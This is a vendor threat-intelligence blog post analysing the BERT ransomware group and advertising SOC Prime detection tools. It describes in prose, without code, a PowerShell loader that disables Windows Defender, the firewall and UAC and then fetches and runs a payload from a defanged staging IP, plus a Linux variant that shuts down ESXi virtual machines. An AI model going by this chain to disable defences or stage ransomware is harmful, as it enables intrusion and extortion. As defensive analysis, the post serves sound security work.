
The 2025 Verizon Data Breach Investigations Report (DBIR) underscores that ransomware remains a prevalent threat, detected in 44% of breaches—an increase from 32% in the previous year’s analysis. With average ransom payments reaching $2 million in 2024, the financial reward is fueling the rise of ransomware activity. As a result, more cybercriminals are turning to ransomware, leading to the emergence of new and aggressive strains like BERT, which targets both Windows and Linux systems. Confirmed victims span Asia, Europe, and the U.S., with healthcare, tech, and event services among the hardest hit.
Detect BERT Ransomware Attacks
According to Cybersecurity Ventures, ransomware attacks are expected to hit every two seconds by 2031, underscoring the urgent need for proactive threat detection and defense. Modern ransomware campaigns continue to evolve, often combining advanced evasion techniques with targeted delivery to bypass traditional security measures. One such emerging threat is BERT ransomware, a cross-platform strain with a growing global footprint, disrupting business operations across sectors.
Sign up for the SOC Prime Platform to detect potential attacks against your organization at the earliest stages. The Platform offers a dedicated set of Sigma rules addressing BERT attacks. Hit the Explore Detections button below to access the rules, which are enriched with actionable CTI and backed by a complete product suite for advanced threat detection and hunting.
All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.
Optionally, cyber defenders can apply the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.
On top of it, security experts might streamline threat investigation using Uncoder AI – a private IDE & co-pilot for threat-informed detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps into performance-optimized queries, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, cyber defenders can use Trend Micro’s research on BERT ransomware to generate Attack Flow in a single click.
BERT Ransomware Attack Analysis
Security researchers have identified a newly emerged ransomware group targeting organizations throughout Asia, Europe, and the U.S., with confirmed victims in the healthcare, technology, and event services industries. BERT, also known as Water Pombero by Trend Micro, deploys ransomware variants compatible with both Windows and Linux systems and combines a straightforward codebase with efficient attack execution.
The group’s tactics involve PowerShell-based loaders, privilege escalation techniques, and simultaneous file encryption, enabling fast and evasive operations despite the simplicity of their code. On Linux, BERT’s ransomware can use up to 50 threads for rapid encryption and is capable of forcefully shutting down ESXi virtual machines to hinder recovery and increase damage. First observed in April, BERT has since expanded its operations across Asia and Europe, with researchers confirming its active campaigns and ongoing development.
The BERT ransomware group uses a simple codebase in its Windows variant, relying on specific strings to identify and terminate processes. Researchers discovered a PowerShell loader script, start.ps1
, which elevates privileges, disables Windows Defender, the firewall, and UAC, then downloads and executes payload.exe from the IP address 185[.]100[.]157[.]74
. While the initial access vector remains unknown, the script uses the -Verb RunAs
parameter to launch the ransomware with admin rights. This IP hosts an open directory containing ransomware components like payload.exe and start.ps1
, suggesting it serves as BERT’s staging infrastructure. Notably, the IP is linked to ASN 39134
, registered in russia, potentially indicating ties to regional threat actors.
Compared to earlier versions, which enumerated drives and stored file paths before encryption, the newer BERT variant uses ConcurrentQueue
and DiskWorker
to encrypt files immediately as they are discovered, demonstrating improvements in performance and execution.
In late spring 2025, researchers identified a Linux variant of BERT ransomware using 50 threads to accelerate encryption and reduce detection. If run without command-line parameters, it forcibly shuts down all ESXi virtual machines to maximize impact. Encrypted files receive the .encrypted_by_bert
extension, and the malware drops a ransom note. The latter is followed by instructions for contacting the attackers to arrange payment negotiations.
The ransomware’s configuration is embedded in JSON format, including its public key, a Base64-encoded ransom note, file extensions, and other operational details. Evidence suggests BERT may have originated from the Linux version of REvil, known for targeting ESXi servers. Code similarities with Babuk and REvil-based ESXi lockers further support this link. JSON-based configs, common in modern ransomware, make BERT adaptable across campaigns.
The BERT ransomware group illustrates how even basic tools can result in successful compromises, proving that emerging actors don’t need advanced methods, only a clear path from entry to exfiltration and coercion. As potential BERT ransomware attack mitigation measures, organizations are encouraged to combine proactive defenses with established security practices. This includes vigilant monitoring of PowerShell activity and unauthorized script execution, especially loaders like start.ps1
, which disable protections and elevate privileges. Enhancing endpoint defenses, limiting administrative privileges, and isolating key assets such as ESXi servers can significantly minimize risk.
Overall, enterprises should adopt a layered, strategic security approach to effectively defend against BERT ransomware and similar threats. By relying on SOC Prime’s complete product suite backed by AI, automation, and real-time threat intelligence, global organizations can strengthen their cybersecurity posture against sophisticated ransomware attacks and other emerging threats.
While no specific threat actor has been officially attributed to the campaign, the use of russian-based infrastructure could indicate potential links with threat groups operating from or connected to that region. For SOC Prime users leveraging Microsoft Defender for Endpoint, enable a Bear Fence plug-n-play always-on service enriched with automated threat hunting and 242 behavior Sigma rules linked to ATT&CK on all russian APT groups since 2021.
The post BERT Ransomware Group Activity Detection: Attacks Across Asia, Europe, and the U.S. Targeting Windows and Linux Platforms appeared first on SOC Prime.